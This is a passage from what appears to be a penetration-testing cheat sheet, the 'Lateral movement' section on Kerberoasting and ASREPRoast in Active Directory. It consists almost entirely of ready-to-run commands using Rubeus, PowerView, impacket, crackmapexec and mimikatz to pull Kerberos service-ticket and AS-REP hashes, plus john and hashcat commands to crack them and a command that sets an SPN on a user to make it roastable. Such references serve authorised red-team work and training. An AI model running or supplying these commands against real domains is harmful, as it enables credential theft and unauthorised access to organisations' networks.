# 5. Lateral movement

### 5.1. Kerberoasting

#### 5.1.1. Identified SPNs

**_Hash extraction_**

1. Specific account

{% code overflow="wrap" %}

```powershell
Rubeus.exe kerberoast /user:<user> /rc4opsec /outfile:hashes.txt
Request-SPNTicket -SPN "<SPN>" -OutputFormat <Hashcat:John> | % { $_.Hash } > hashes.txt
impacket-GetUserSPNs -request -dc-ip IP <Full.Domain>/<USER>:<PASSWORD> -request-user <USER> -outputfile hashes.txt
```

{% endcode %}

2. All accounts

{% code overflow="wrap" %}

```powershell
#Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat <Hashcat:John> | % { $_.Hash } > hashes.txt

Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat <Hashcat:John> > hashes.txt
Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt
crackmapexec ldap DC-IP -u <USER> -p <PASS> --kerberoasting hashes.txt
impacket-GetUserSPNs -request -dc-ip IP <Full.Domain>/<USER>:<PASSWORD> -outputfile hashes.txt

#From memory to disk
kerberos::list /export
```

{% endcode %}

**_Cracking hashes_**

john

```powershell
john --wordlist=<wordlist path> hashes.txt
```

hashcat

```powershell
hashcat -m 13100 --force -a 0 hashes.txt <wordlist path>
```

#### 5.1.2. Set SPN

```powershell
Set-DomainObject -Identity <USER> -Set @{serviceprincipalname='Service/Name'}
```

### 5.2. ASREPRoast

**_Obtaining hashes_**

From a specific account

```powershell
#ASREPRoast.ps1
Get-ASREPHash -UserName <USER> -Verbose
```

From all accounts

```powershell
Rubeus.exe asreproast /format:<hashcat:john> /outfile:hashes.txt
crackmapexec ldap DC-IP -u <USER> -p <PASS> --asreproast hashes.txt
```

GetNPUsers

{% code overflow="wrap" %}

```powershell
# With credentials
impacket-GetNPUsers -request -dc-ip <IP> <Full.Domain>/<USER>:<PASSWORD> -format <hashcat:john> -outputfile hashes.txt
# With a list of users (no credentials)
impacket-GetNPUsers -request -dc-ip IP -usersfile users.txt <Full.Domain>/ -format <hashcat:john> -outputfile hashes.txt
```

{% endcode %}

**_Cracking hashes_**

john

```powershell
john --wordlist=<wordlist path> hashes.txt
```

hashcat

```powershell
hashcat -m 18200 --force -a 0 hashes.txt <wordlist path>
```


